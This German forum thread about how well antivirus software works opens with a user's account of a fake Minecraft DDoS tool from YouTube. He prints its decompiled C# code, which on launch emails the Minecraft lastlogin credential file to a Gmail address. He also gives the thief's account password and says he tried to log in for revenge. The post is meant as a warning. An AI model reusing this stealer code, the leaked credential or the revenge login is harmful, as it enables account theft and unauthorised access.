Wie gut sind Anti-Viren wirklich?
- Trojaner
- Geschlossen
-
-
Diar und ich wollten mal DDoS an seinem Minecraft Server ausprobieren. Er schickte mir dazu einen Link zu einer Mediafire Datei die er über YouTube gefunden hatte.
Als ich die Datei öffnete, machte ich mir keine Sorgen, denn das Programm sah seriös aus. Ich klicke dann schön auf den "DDoS" Button (natürlich mit Diar's Erlaubnis...) , doch nichts passierte!
Da wurde ich langsam misstrauisch und setzte meine Reverse-Engineering Kenntnisse ein. Das Programm war eines der fiesesten überhaupt!
Ich war so schockiert das ich sofort mein Passwort auf ein sehr sicheres geändert habe.
Denn, sobald man das Programm startet, wird folgender Code ausgeführt:Code
Alles anzeigenprivate void Form1_Load(object sender, EventArgs e) { MailMessage message = new MailMessage(); try { Attachment item = new Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\.minecraft\lastlogin"); message.Attachments.Add(item); message.From = new MailAddress("neilnetco@gmail.com"); message.To.Add("neilnetco@gmail.com"); message.Subject = "LastLoginFile"; message.Body = "Account H4x3D!"; [zensiert] } catch (Exception exception1) { ProjectData.SetProjectError(exception1); Exception exception = exception1; ProjectData.ClearProjectError(); } }
Hier "übersetze" ich mal den Code:
Als erstes wird auf die Minecraft LastLogin Datei verwiesen, welche die Login Informationen beinhaltet (Der Minecraft Launcher speichert sie da drinnen).
Danach wird eine EMail generiert, von neilnetco@gmail.com an neilnetco@gmail.com. Der Betreff ist "LastLoginFile", der Inhalt "Account H4x3D" und als Anhang dann die LastLogin Datei. Danach wird diese EMail per Google Mail (aka GMail) gesendet. Natürlich war der Autor zu dumm dafür um das PW vom Account zu verschlüsseln, und siehe da, "bonkheads6" ist das Passwort. Natürlich wollte ich Vergeltung und mich in dem Account einloggen, allerdings wurde das Passwort schon vor 34 Tagen geändert.
Also wurden wohl die Daten nicht gesendet, da im Programm das alte Passwort genutzt wird.
Trotzdem warnte ich alle über die Kommentar Funktion von YouTube und meldete natürlich das Video sofort, mit der Begründung das es zu einem Programm verlinkt Login Informationen klaut mit dem Quellcode und genau in der Minute nach dem ich es gesendet hatte, wurde das Video verbannt. (Siehe: http://www.youtube.com/watch?v=gERm0Z3-9QE)Nach der Sache war ich einfach schockiert, habe sofort mein Minecraft Passwort geändert. Mit der LastLogin Datei kann man einfach mit bisschen Programmierkenntnissen das Minecraft Passwort herausfinden.
Ich werde nicht den Link zum Programm hier bereitstellen.
Also Leute, nochmal: Nicht jeden Scheiß downloaden, und das schon gar nicht bei YouTube Videos.
-
-
-
-
-
-
-
-
Comodo
-
-
-
-
-
Losspost. Mac hat Java. Java bedeutet unsicher. Unsicher bedeutet Mac kann Viren haben.
Leute wie du denken einfach sich nichts dabei, aber es gibt trotzdem auch Viren für Mac's, die sind allerdings weniger verbreitet, da es einfach viel mehr Windows Nutzer gibt. Derzeit gibt es sicher mehr Nutzer vom 10 Jahre alten Windows XP als von Mac OS X... -
-
Ähm... Nein?
Antivirenprogramme geben keinen 100%igen Schutz. Sie wehren nur einfache Viren ab. Wie du ja an trojaners Virus gesehen hast, kann man antiviren Programme leicht umgehen. Selbst mit 10 antiviren Programmen auf einem Computer kannst du dir leicht einen Virus auf den Computer holen. Und es gibt genug Viren, die auf dem Computer vorhanden sind, jedoch vom Benutzer nicht bemerkt werden.
-
und du bekommst zu 99% keine Viren
Ich zitiere einfach mal:
Zitat von http://support.apple.com/kb/DL1572
Java for OS X 2013-003 delivers improved security, reliability, and compatibility by updating Java SE 6 to 1.6.0_45.
Weißt du was das heißt ?
Das Java auf Mac ist ( wenn man dieses ''Update'' installiert ) immer noch hoffnungslos veraltet. Wer sich nur auf die Systemupdates verlässt der hat damit eine Sicherheitslücke in seinem System klaffen, die sich nicht schließt. Aktuelle JRE's bekommst du eigentlich nur noch von Drittanbietern - und wer weiß wann die Updaten nachdem ein Sicherheitsproblem entdeckt wurde. -
-